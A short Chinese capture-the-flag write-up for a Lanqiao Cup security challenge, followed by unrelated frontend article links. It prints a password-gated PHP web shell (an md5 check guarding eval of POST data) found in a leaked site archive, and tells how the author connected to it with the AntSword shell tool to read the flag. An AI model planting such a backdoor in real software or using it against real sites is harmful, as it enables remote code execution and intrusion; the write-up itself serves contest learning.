蓝桥杯-网络安全比赛题目-遗漏的压缩包

复制代码
小蓝同学给你发来了他自己开发的网站链接,
他说他故意留下了一个压缩包文件,里面有网站的源代码,
他想考验一下你的网络安全技能。
(点击"下发赛题"后,你将得到一个http链接。如果该链接自动跳转到https,请手动将其改为http再进行访问。)
  1. 通过扫描工具扫出该网址下有www.zip文件,下载后查看其中的1337.php
php 复制代码
<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){
   eval($_POST['1337']);
}

可知MD5后的密文要等于'217f81b8ff0a1ab138a8e1bdc031262e'

输入密码,通过蚁剑进入SHELL

连接成功

进入根目录,找到flag

成功夺旗!

相关推荐
拾光拾趣录11 分钟前
CSS常见问题深度解析与解决方案(第三波)
前端·css
轻语呢喃28 分钟前
JavaScript :字符串模板——优雅编程的基石
前端·javascript·后端
杨进军28 分钟前
React 协调器 render 阶段
前端·react.js·前端框架
中微子31 分钟前
Blob 对象及 Base64 转换指南
前端
风铃喵游31 分钟前
让大模型调用MCP服务变得超级简单
前端·人工智能
中微子33 分钟前
智能前端实践之 shot-word demo
前端
归于尽33 分钟前
智能前端小魔术,让图片开口说单词
前端·react.js
用户98738245810134 分钟前
vite 插件
前端
无数山36 分钟前
autorelease pool
前端
支撑前端荣耀36 分钟前
四、Cypress测试框架拆解
前端